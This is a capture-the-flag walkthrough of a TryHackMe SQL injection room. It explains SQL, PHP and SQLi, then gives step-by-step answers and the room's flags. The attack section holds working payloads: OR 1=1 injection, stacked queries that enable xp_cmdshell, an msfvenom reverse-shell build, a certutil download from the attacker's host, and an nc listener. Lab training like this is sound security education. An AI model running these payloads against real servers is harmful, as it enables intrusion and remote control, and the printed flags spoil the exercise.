The Best Festival Company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year! After looking into the matter, Santa’s Security Operations Center (SSOC) confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access.

Structured query language (SQL) is essential for working with relational databases and building dynamic websites. Even if you’ve never explicitly used SQL before, chances are you frequently interact with databases. Whether you’re checking your bank account balance online, browsing through products on an e-commerce website, or posting a status on social media, you’re indirectly querying and altering databases. SQL is one of the most popular languages that make this all possible.

Relational databases are structured data collections organised into tables, each consisting of various rows and columns. Within these collections, tables are interconnected with predefined relationships, facilitating efficient data organisation and retrieval. For example, an e-commerce relational database might include tables for “customers”, “orders”, and “products”, with relationships defined to link customer information to their respective orders through the use of identifiers:

PHP is a popular general-purpose scripting language that plays a crucial role in web development. It enables developers to create dynamic and interactive websites by generating HTML content on the server and delivering it to the client’s web browser. PHP’s versatility and seamless integration with SQL databases make it a powerful tool for building feature-rich, dynamic web applications.

PHP is a server-side scripting language, meaning the code is executed on the web server before the final HTML is sent to the user’s browser. Unlike client-side technologies like HTML, CSS, and JavaScript, PHP allows developers to perform various server-side tasks, such as connecting to a wide range of databases (such as MySQL, PostgreSQL, and Microsoft SQL Server), executing SQL queries, processing form data, and dynamically generating web content.

Taking in user-supplied input gives us powerful ways to create dynamic content, but failing to secure this input correctly can expose a critical vulnerability known as SQL injection (SQLi). SQL injection is an attack technique that exploits how web applications handle user input, particularly in SQL queries. Instead of providing legitimate input (like the ornament colour in the example above), the attacker injects malicious SQL statements into a web application’s input fields or parameters. The application’s database server then executes this rogue SQL query.

SQL injection vulnerabilities pose a considerable risk to web applications as they can lead to unauthorised access, data theft, data manipulation, or even the complete compromise of a web application and its underlying database through remote code execution. If an attacker can control which queries the database executes, they can control the database functions performed and the data returned. As such, the impact can be catastrophic, ranging from exposing sensitive user information to causing significant data breaches.

SQL injection vulnerabilities continue to be highly pervasive despite numerous advancements to mitigate them. This type of vulnerability is featured prominently in the OWASP Top 10 list of critical web application security risks (A03:2021-Injection).

1. Start the TryHackMe’s VPN or Attack box
2. Start the Machine and paste the IP on browser

1. Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?

Ans: /giftsearch.php

2. Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?

Inject a Quote on a parameter ‘

Ans: ODBC Driver 17 for SQL Server

3. Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?

Inject the code after the value of parameter ‘OR 1=1 --

Ans: THM{a4ffc901c27fb89efe3c31642ece4447}

4. What flag is in the note file Gr33dstr left behind on the system?

1. Inject the below code first
   http://THM-MACHINE-IP/giftresults.php?age='; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE; --
2. Create a payload using the below command
   msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR.IP.ADDRESS.HERE LPORT=4444 -f exe -o reverse.exe

3. Start an HTTP server to host the payload with the below command
python3 -m http.server 8000

4. Send the payload to the victim site using the below command
http://THM-MACHINE-IP/giftresults.php?age='; EXEC xp_cmdshell ‘certutil -urlcache -f http://YOUR.LISTENING.IP.ADDRESS.HERE:8000/reverse.exe C:\Windows\Temp\reverse.exe’;--

5. Set a listener using the below command
nc -lnvp 4444

6. Execute the payload using the command
http://THM-MACHINE-IP/giftresults.php?age='; EXEC xp_cmdshell ‘C:\Windows\Temp\reverse.exe’; —

7. Change the directory to Administrator using the command
Cd C:\Users\Administrator

8. View the Content of Note.txt using the below command
type Note.txt

Ans: THM{b06674fedd8dfc28ca75176d3d51409e}

5. What is the flag you receive on the homepage after restoring the website?

Use your skills to find the Answer for this Question

If you are unble to find, use the below video to find the answer